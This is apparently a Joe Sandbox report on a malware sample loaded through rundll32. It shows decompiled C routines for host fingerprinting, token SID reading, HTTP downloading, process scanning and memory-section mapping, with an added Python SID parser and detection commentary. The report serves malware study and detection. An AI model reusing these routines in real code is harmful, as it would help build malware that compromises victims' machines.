                                             				asm("cpuid");             /* the decompiler shows eax as 1 at this point, i.e. leaf 1: processor signature and feature flags */
                                             				_t67 =  &_v28;
                                             				 *_t67 = 1;               /* these four stores save eax, ebx, ecx, edx; the values shown are the decompiler's pre-cpuid register state */
                                             				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                             				 *((intOrPtr*)(_t67 + 8)) = 0;
                                             				 *(_t67 + 0xc) = _t64;
                                             				_t39 = _v16 ^ _v20 ^ _v28;                        /* edx ^ ecx ^ eax of the cpuid result */
                                             				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;               /* CPU-derived value XORed into +4: user name, computer name and CPU together form a per-host fingerprint */
                                             				return _t39;
                                             			}

                                            APIs
                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 049F130A
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 049F1321
                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 049F132E
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F134F
                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 049F1376
                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 049F138A
                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 049F1397
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F13B5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: HeapName$AllocateComputerFreeUser
                                            • String ID:
                                            • API String ID: 3239747167-0
                                            • Opcode ID: 8723b09a756c4da73a415b9a7dad4a06e78bf940c994e88dbbc6b2849231e055
                                            • Instruction ID: 2975bbd74eb8f9df4c2d7d55113e9ff518dfde15e22862e0edb02e065d38e27c
                                            • Opcode Fuzzy Hash: 8723b09a756c4da73a415b9a7dad4a06e78bf940c994e88dbbc6b2849231e055
                                            • Instruction Fuzzy Hash: 88312AB2A04205EFDB10DFA9DC81AAEBBF9FB48204F554079E944D3210EB74EE409B50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                             Basic blocks (address range, calls made in the block, successors):
                                             • 479: 580be55-580be67 -> 480, 481
                                             • 480: 580be71 -> 482
                                             • 481: 580be69-580be6f -> 482
                                             • 482: 580be77-580be8b (call 58013c3) -> 485, 486
                                             • 485: 580bec7-580bef1 (call 58212f1) -> 492, 493
                                             • 486: 580be8d-580be9b (StrRChrA) -> 487, 488
                                             • 487: 580bea0 -> 490
                                             • 488: 580be9d-580be9e -> 490
                                             • 490: 580bea6-580bec1 (_strupr, lstrlen, call 5811c16) -> 485
                                             • 492: 580bef3-580bef7 -> 493, 495
                                             • 493: 580bf0f-580bf17 -> 496, 497
                                             • 495: 580bef9-580bf04 -> 493, 499
                                             • 496: 580bf19-580bf1c -> 500
                                             • 497: 580bf1e-580bf3c (CreateEventA) -> 501, 502
                                             • 499: 580bf06-580bf0d -> 493, 499 (loops on itself)
                                             • 500: 580bf7c-580bf83 -> 503, 504
                                             • 501: 580bf70-580bf76 (GetLastError) -> 506
                                             • 502: 580bf3e-580bf45 (call 58137c5) -> 501, 508
                                             • 503: 580bf92-580bf97 -> (exit)
                                             • 504: 580bf85-580bf8c (RtlRemoveVectoredExceptionHandler) -> 503
                                             • 506: 580bf78-580bf7a -> 500, 503
                                             • 508: 580bf47-580bf4e -> 509, 510
                                             • 509: 580bf50-580bf5c (RtlAddVectoredExceptionHandler) -> 510
                                             • 510: 580bf61-580bf64 (call 581312e) -> 512
                                             • 512: 580bf69-580bf6e -> 501, 506
                                            APIs
                                            • StrRChrA.SHLWAPI(05D7B5B0,00000000,0000005C,?,?,?), ref: 0580BE91
                                            • _strupr.NTDLL ref: 0580BEA7
                                            • lstrlen.KERNEL32(05D7B5B0,?,?), ref: 0580BEAF
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 0580BF2F
                                            • RtlAddVectoredExceptionHandler.NTDLL(00000000,058196E0), ref: 0580BF56
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0580BF70
                                            • RtlRemoveVectoredExceptionHandler.NTDLL(056F05B8), ref: 0580BF86
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                                            • String ID:
                                            • API String ID: 2251957091-0
                                            • Opcode ID: a3c4b55cc46011765bfc668ddd7049ff98eaf94077d8fe89c456c55b02388fe1
                                            • Instruction ID: 943049db062d07e7e19b748ef7a354dacdab336991d304f15420d1fc44b7f848
                                            • Opcode Fuzzy Hash: a3c4b55cc46011765bfc668ddd7049ff98eaf94077d8fe89c456c55b02388fe1
                                            • Instruction Fuzzy Hash: C731E772A242149FDB70AFBA9C8E96E7FA9BB04211F059465FD02D31D0DE346CC08F51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 38%
                                             			E049F4695(char _a4, void* _a8) {      /* _a4: target PID; _a8: caller's 0x1C-byte buffer that receives the SID */
                                             				void* _v8;      /* token handle */
                                             				void* _v12;     /* process handle */
                                             				char _v16;      /* CLIENT_ID.UniqueThread = 0 */
                                             				void* _v20;     /* CLIENT_ID.UniqueProcess = PID */
                                             				char _v24;      /* remaining OBJECT_ATTRIBUTES fields, all zero */
                                             				char _v28;
                                             				char _v32;
                                             				char _v36;
                                             				char _v40;
                                             				void* _v44;     /* OBJECT_ATTRIBUTES.Length */
                                             				void** _t33;
                                             				void* _t40;
                                             				void* _t43;
                                             				void** _t44;
                                             				intOrPtr* _t47;
                                             				char _t48;
                                             
                                             				asm("stosd");   /* five stosd: zero-fill the stack structures before the explicit stores below */
                                             				asm("stosd");
                                             				asm("stosd");
                                             				asm("stosd");
                                             				asm("stosd");
                                             				_v20 = _a4;
                                             				_t48 = 0;       /* return value: 1 only when the SID was copied */
                                             				_v16 = 0;
                                             				_a4 = 0;        /* the PID slot is reused as the ReturnLength out-parameter below */
                                             				_v44 = 0x18;    /* sizeof(OBJECT_ATTRIBUTES) on x86 */
                                             				_v40 = 0;
                                             				_v32 = 0;
                                             				_v36 = 0;
                                             				_v28 = 0;
                                             				_v24 = 0;
                                             				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {      /* 0x400 = PROCESS_QUERY_INFORMATION */
                                             					_t33 =  &_v8;
                                             					__imp__(_v12, 8, _t33);                                   /* NtOpenProcessToken (see APIs): 8 = TOKEN_QUERY */
                                             					if(_t33 >= 0) {                                           /* the decompiler reuses _t33 for the NTSTATUS */
                                             						_t47 = __imp__;                                       /* NtQueryInformationToken (see APIs) */
                                             						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed        /* class 1 = TokenUser, NULL buffer: required size returned in _a4 */
                                             						_t44 = E049F4DF6(_a4);                                /* heap allocation of that size (RtlAllocateHeap, see the subcall entry) */
                                             						if(_t44 != 0) {
                                             							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed    /* fills a TOKEN_USER; its first member is the SID pointer */
                                             							if(_t40 >= 0) {
                                             								memcpy(_a8,  *_t44, 0x1c);                    /* 28 bytes = SID header + five sub-authorities, the S-1-5-21-...-RID shape of user accounts */
                                             								_t48 = 1;
                                             							}
                                             							E049F4C73(_t44);                                  /* presumably releases the buffer (not shown on this page) */
                                             						}
                                             						NtClose(_v8); // executed
                                             					}
                                             					NtClose(_v12);
                                             				}
                                             				return _t48;
                                             			}
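
E049F4695 opens the process whose PID is passed in _a4 with PROCESS_QUERY_INFORMATION (0x400), opens its token for TOKEN_QUERY (8), queries TokenUser (class 1) twice (size, then data) and copies a fixed 0x1C = 28 bytes from the SID pointer at the start of the TOKEN_USER structure into the caller's buffer. 28 bytes is the size of a SID with exactly five sub-authorities, i.e. the S-1-5-21-<domain>-<RID> form of ordinary accounts, so the fixed-size copy silently assumes that SID shape: a shorter SID such as S-1-5-18 is copied with trailing garbage, and a SID with more sub-authorities is truncated. The Python below is an added example and not code from the report or from the sample: it parses and builds binary SIDs (the SID values used are constructed) and checks whether a given SID survives the fixed 28-byte copy intact.

```python
import struct

SID_HEADER_LEN = 8      # revision (1) + sub-authority count (1) + identifier authority (6, big-endian)
SID_MAX_SUB_AUTHORITIES = 15
FIXED_COPY_LEN = 0x1C   # what E049F4695 copies out of TOKEN_USER.User.Sid


def sid_length(blob: bytes) -> int:
    """Length in bytes of the SID at the start of blob, derived from its sub-authority count."""
    if len(blob) < SID_HEADER_LEN:
        raise ValueError("buffer shorter than a SID header")
    return SID_HEADER_LEN + 4 * blob[1]


def parse_sid(blob: bytes) -> str:
    """Renders a binary SID as S-R-A-S1-...-Sn; bytes after the SID are ignored."""
    need = sid_length(blob)
    revision, count = blob[0], blob[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if count > SID_MAX_SUB_AUTHORITIES:
        raise ValueError("too many sub-authorities for a valid SID")
    if len(blob) < need:
        raise ValueError("buffer truncated: sub-authorities missing")
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack_from(f"<{count}I", blob, SID_HEADER_LEN)
    return "-".join(["S", str(revision), str(authority), *(str(s) for s in subs)])


def build_sid(authority: int, subauthorities: list) -> bytes:
    """Inverse of parse_sid; used here to construct sample SIDs."""
    return (bytes([1, len(subauthorities)]) + authority.to_bytes(6, "big")
            + struct.pack(f"<{len(subauthorities)}I", *subauthorities))


def fits_fixed_copy(sid: bytes) -> bool:
    """True when a fixed 0x1C-byte memcpy captures the whole SID (at most five sub-authorities)."""
    return sid_length(sid) <= FIXED_COPY_LEN


def sid_from_fixed_copy(buf: bytes) -> str:
    """What the caller of E049F4695 reads back from its 0x1C-byte buffer."""
    if len(buf) != FIXED_COPY_LEN:
        raise ValueError("expected exactly 0x1C bytes")
    return parse_sid(buf)


if __name__ == "__main__":
    # Constructed sample: a domain user SID with made-up domain identifiers and RID 1001.
    user = build_sid(5, [21, 1111, 2222, 3333, 1001])
    print(parse_sid(user), len(user), fits_fixed_copy(user))
```

When writing detection or correlation logic around this routine, compare SIDs by their declared length rather than by the full 28-byte buffer, since the bytes after a short SID are whatever followed it in the token buffer.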

                                            APIs
                                            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 049F46DC
                                            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 049F46EF
                                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 049F470B
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 049F4728
                                            • memcpy.NTDLL(?,00000000,0000001C), ref: 049F4735
                                            • NtClose.NTDLL(?), ref: 049F4747
                                            • NtClose.NTDLL(00000000), ref: 049F4751
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                            • String ID:
                                            • API String ID: 2575439697-0
                                            • Opcode ID: fe7e0f82e2aff38019fe79765948c8850d556b9d5eb38694b056a2c490f58d08
                                            • Instruction ID: f8eac861fabde1c3fe3f87b4e1b2e1a1729608d0d35b91f38c0eace4f7c0ab29
                                            • Opcode Fuzzy Hash: fe7e0f82e2aff38019fe79765948c8850d556b9d5eb38694b056a2c490f58d08
                                            • Instruction Fuzzy Hash: 5521E6B2900228BBDB01AF95CC85ADEBFBDEF98750F104026FA05A6120D7719A449BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 05821338
                                            • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0582134B
                                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 05821367
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 05821384
                                            • memcpy.NTDLL(?,00000000,0000001C), ref: 05821391
                                            • NtClose.NTDLL(?), ref: 058213A3
                                            • NtClose.NTDLL(?), ref: 058213AD
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                            • String ID:
                                            • API String ID: 2575439697-0
                                            • Opcode ID: fc8513adde67eb4b55706700899ab9e3e34e1d38ef2da4059289dca0e61dbb16
                                            • Instruction ID: 8cfa9a79b1533b3d3a06c5f1e80221386d0dbf7dadd75e6486d8f214362c4fc6
                                            • Opcode Fuzzy Hash: fc8513adde67eb4b55706700899ab9e3e34e1d38ef2da4059289dca0e61dbb16
                                            • Instruction Fuzzy Hash: D121FA72A10228BBDF119F95CC499DEBFBDEF08740F108116F905E6160D7719A85DFA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 70%
                                            			E049F4CC6(void* __eax, void* __ecx) {
                                            				long _v8;
                                            				void* _v12;
                                            				void* _v16;
                                            				void _v20;
                                            				void* __esi;
                                            				void* _t36;
                                            				intOrPtr* _t37;
                                            				intOrPtr* _t39;
                                            				int _t43;
                                            				long _t45;
                                            				void* _t53;
                                            				long _t58;
                                            				void* _t59;
                                            
                                            				_t53 = __ecx;
                                            				_t59 = __eax;
                                            				_t58 = 0;
                                            				ResetEvent( *(__eax + 0x1c));
                                            				if(InternetReadFile( *(_t59 + 0x18),  &_v20, 4,  &_v8) != 0) {
                                            					L5:
                                            					if(_v8 == 0) {
                                            						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                            						L21:
                                            						return _t58;
                                            					}
                                            					 *0x49fa174(0, 1,  &_v12); // executed
                                            					if(0 != 0) {
                                            						_t58 = 8;
                                            						goto L21;
                                            					}
                                            					_t36 = E049F4DF6(0x1000);
                                            					_v16 = _t36;
                                            					if(_t36 == 0) {
                                            						_t58 = 8;
                                            						L18:
                                            						_t37 = _v12;
                                            						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                            						goto L21;
                                            					}
                                            					_push(0);
                                            					_push(_v8);
                                            					_push( &_v20);
                                            					while(1) {
                                            						_t39 = _v12;
                                            						_t56 =  *_t39;
                                            						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                            						ResetEvent( *(_t59 + 0x1c));
                                            						_t43 = InternetReadFile( *(_t59 + 0x18), _v16, 0x1000,  &_v8); // executed
                                            						if(_t43 != 0) {
                                            							goto L13;
                                            						}
                                            						_t58 = GetLastError();
                                            						if(_t58 != 0x3e5) {
                                            							L15:
                                            							E049F4C73(_v16);
                                            							if(_t58 == 0) {
                                            								_t45 = E049F56EC(_v12, _t59); // executed
                                            								_t58 = _t45;
                                            							}
                                            							goto L18;
                                            						}
                                            						_t58 = E049F3A6F( *(_t59 + 0x1c), _t56, 0xffffffff);
                                            						if(_t58 != 0) {
                                            							goto L15;
                                            						}
                                            						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                            						if(_t58 != 0) {
                                            							goto L15;
                                            						}
                                            						L13:
                                            						_t58 = 0;
                                            						if(_v8 == 0) {
                                            							goto L15;
                                            						}
                                            						_push(0);
                                            						_push(_v8);
                                            						_push(_v16);
                                            					}
                                            				}
                                            				_t58 = GetLastError();
                                            				if(_t58 != 0x3e5) {
                                            					L4:
                                            					if(_t58 != 0) {
                                            						goto L21;
                                            					}
                                            					goto L5;
                                            				}
                                            				_t58 = E049F3A6F( *(_t59 + 0x1c), _t53, 0xffffffff);
                                            				if(_t58 != 0) {
                                            					goto L21;
                                            				}
                                            				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                            				goto L4;
                                             			}

                                            APIs
                                            • ResetEvent.KERNEL32(?), ref: 049F4CDC
                                            • InternetReadFile.WININET(?,?,00000004,?), ref: 049F4CEB
                                            • GetLastError.KERNEL32 ref: 049F4CF5
                                              • Part of subcall function 049F3A6F: WaitForMultipleObjects.KERNEL32(00000002,049F7B35,00000000,049F7B35,?,?,?,049F7B35,0000EA60), ref: 049F3A8A
                                            • ResetEvent.KERNEL32(?), ref: 049F4D6E
                                            • InternetReadFile.WININET(?,?,00001000,?), ref: 049F4D7F
                                            • GetLastError.KERNEL32 ref: 049F4D89
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: ErrorEventFileInternetLastReadReset$MultipleObjectsWait
                                            • String ID:
                                            • API String ID: 3290165071-0
                                            • Opcode ID: 327e5762edd48a0bf773811ab5c7922e309217542f2cfcda09d03a4f1dcb84f9
                                            • Instruction ID: 04e8a71c6d18a37c1413f3be4fae7c823c954f86fefc29f6325a9e74c07c9fe5
                                            • Opcode Fuzzy Hash: 327e5762edd48a0bf773811ab5c7922e309217542f2cfcda09d03a4f1dcb84f9
                                            • Instruction Fuzzy Hash: F831AE36A00604BFDB22AFA4DC44BAFB7BAEF94364F154538E615D7190EB30F9018B10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05815CCC
                                            • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 05815CD9
                                            • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 05815D65
                                            • GetModuleHandleA.KERNEL32(00000000), ref: 05815D70
                                            • RtlImageNtHeader.NTDLL(00000000), ref: 05815D79
                                            • RtlExitUserThread.NTDLL(00000000), ref: 05815D8E
                                              • Part of subcall function 0581199F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05815D07,?), ref: 058119A7
                                              • Part of subcall function 0581199F: GetVersion.KERNEL32 ref: 058119B6
                                              • Part of subcall function 0581199F: GetCurrentProcessId.KERNEL32 ref: 058119D2
                                              • Part of subcall function 0581199F: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 058119EF
                                              • Part of subcall function 0580685A: memcpy.NTDLL(00000000,?,?,?), ref: 058068B9
                                              • Part of subcall function 05803AEB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0581A192), ref: 05803B11
                                              • Part of subcall function 05804345: GetModuleHandleA.KERNEL32(?,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000,?), ref: 05804366
                                              • Part of subcall function 05804345: GetProcAddress.KERNEL32(00000000,?), ref: 0580437F
                                              • Part of subcall function 05804345: OpenProcess.KERNEL32(00000400,00000000,69B25F44,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?), ref: 0580439C
                                              • Part of subcall function 05804345: IsWow64Process.KERNEL32(?,00000000,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000), ref: 058043AD
                                              • Part of subcall function 05804345: FindCloseChangeNotification.KERNEL32(?,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000,?), ref: 058043C0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
                                            • String ID:
                                            • API String ID: 2581485877-0
                                            • Opcode ID: 61c301c856c829593b1fb97003b1ff6cda72a4e107b08af99e48c7110f9c93a1
                                            • Instruction ID: 90995251fda7c132d3608a0f6a7beb19799ce6bf639d74427f5a21334e0e3808
                                            • Opcode Fuzzy Hash: 61c301c856c829593b1fb97003b1ff6cda72a4e107b08af99e48c7110f9c93a1
                                            • Instruction Fuzzy Hash: 6C318171A10214AFCB21AF68DC89EBE7FB9FB84650B108138FD16E7150DA349D44CF65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E049F6DB6() {
                                            				char _v264;
                                            				void* _v300;
                                            				void* _t5;
                                            				int _t8;
                                            				intOrPtr _t9;
                                            				int _t15;
                                            				void* _t17;
                                            
                                            				_t15 = 0;
                                            				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                                            				_t17 = _t5;
                                            				if(_t17 != 0) {
                                            					_t8 = Process32First(_t17,  &_v300);
                                            					while(_t8 != 0) {
                                            						_t9 =  *0x49fa348; // 0x57d5a8
                                            						_t2 = _t9 + 0x49fbea8; // 0x73617661
                                            						_push( &_v264);
                                            						if( *0x49fa12c() != 0) {
                                            							_t15 = 1;
                                            						} else {
                                            							_t8 = Process32Next(_t17,  &_v300);
                                            							continue;
                                            						}
                                            						L7:
                                            						FindCloseChangeNotification(_t17); // executed
                                            						goto L8;
                                            					}
                                            					goto L7;
                                            				}
                                            				L8:
                                            				return _t15;
                                             			}

                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 049F6DC6
                                            • Process32First.KERNEL32(00000000,?), ref: 049F6DD9
                                            • Process32Next.KERNEL32(00000000,?), ref: 049F6E05
                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 049F6E14
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 3243318325-0
                                            • Opcode ID: 08ab724e9c28306dc303a0c50d244ba3cd3b29ada71848955fb190227c2e5ae4
                                            • Instruction ID: c73cede9eb3a2ba7b234ff700a5c2be6a476601bb9b62c15e24dace1cfe60ba0
                                            • Opcode Fuzzy Hash: 08ab724e9c28306dc303a0c50d244ba3cd3b29ada71848955fb190227c2e5ae4
                                            • Instruction Fuzzy Hash: 7CF030736052246ADB20AA76DC4CEEB76ACDBC5758F010171EF49D2100EA74EDA687A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetProcAddress.KERNEL32(?,00000318), ref: 058144CA
                                            • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 058144E6
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                              • Part of subcall function 05801C78: GetProcAddress.KERNEL32(?), ref: 05801CA1
                                              • Part of subcall function 05801C78: NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,?), ref: 05801CC3
                                            • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000100,00000200), ref: 05814650
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                                            • String ID:
                                            • API String ID: 3547194813-0
                                            • Opcode ID: 43e39f471050e2ef72a676ef1f4bf3b1e5b677bd994d5027c2ceeeea1e9ae9c3
                                            • Instruction ID: e1ec24c85c319dca0212d122bfb8510470f7fcdb31464db6b7f7f0ceaeec5a7b
                                            • Opcode Fuzzy Hash: 43e39f471050e2ef72a676ef1f4bf3b1e5b677bd994d5027c2ceeeea1e9ae9c3
                                            • Instruction Fuzzy Hash: 03612E71A00606AFEF14DF99C884AAEBBB8FF08314F104129ED15E7251DB70ED50CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memset.NTDLL ref: 0581F613
                                            • GetProcAddress.KERNEL32(?), ref: 0581F63B
                                            • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 0581F659
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressInformationProcProcess64QueryWow64memset
                                            • String ID:
                                            • API String ID: 2968673968-0
                                            • Opcode ID: 51e8118a1f3c6f776519ae6b6a9123278a81dc93d4a1d6d54166f10436983352
                                            • Instruction ID: b7f83d9b9bc32035976cf7c9b7bc7f824193e2776c54023770eeb8396a663fc9
                                            • Opcode Fuzzy Hash: 51e8118a1f3c6f776519ae6b6a9123278a81dc93d4a1d6d54166f10436983352
                                            • Instruction Fuzzy Hash: C6118F71A10209AFDB10DB95DC19F997BACEB44700F058024FE04EB290EB30AD05CB74
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E049F25D7(intOrPtr* __eax, void** _a4) {
                                            				int _v12;
                                            				void* _v16;
                                            				void* _v20;
                                            				void* _v24;
                                            				int _v28;
                                            				int _v32;
                                            				intOrPtr _v36;
                                            				int _v40;
                                            				int _v44;
                                            				void* _v48;
                                            				void* __esi;
                                            				long _t34;
                                            				void* _t39;
                                            				void* _t47;
                                            				intOrPtr* _t48;
                                            
                                            				_t48 = __eax;
                                            				asm("stosd");
                                            				asm("stosd");
                                            				asm("stosd");
                                            				asm("stosd");
                                            				asm("stosd");
                                            				asm("stosd");
                                            				_v24 =  *((intOrPtr*)(__eax + 4));
                                            				_v16 = 0;
                                            				_v12 = 0;
                                            				_v48 = 0x18;
                                            				_v44 = 0;
                                            				_v36 = 0x40;
                                            				_v40 = 0;
                                            				_v32 = 0;
                                            				_v28 = 0;
                                            				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                            				if(_t34 < 0) {
                                            					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                            				} else {
                                            					 *_t48 = _v16;
                                            					_t39 = E049F3A9C(_t48,  &_v12); // executed
                                            					_t47 = _t39;
                                            					if(_t47 != 0) {
                                            						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                            					} else {
                                            						memset(_v12, 0, _v24);
                                            						 *_a4 = _v12;
                                            					}
                                            				}
                                            				return _t47;
                                            			}

                                            APIs
                                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,049F759F), ref: 049F2634
                                              • Part of subcall function 049F3A9C: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,049F2649,00000002,00000000,?,?,00000000,?,?,049F2649,00000000), ref: 049F3AC9
                                            • memset.NTDLL ref: 049F2656
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
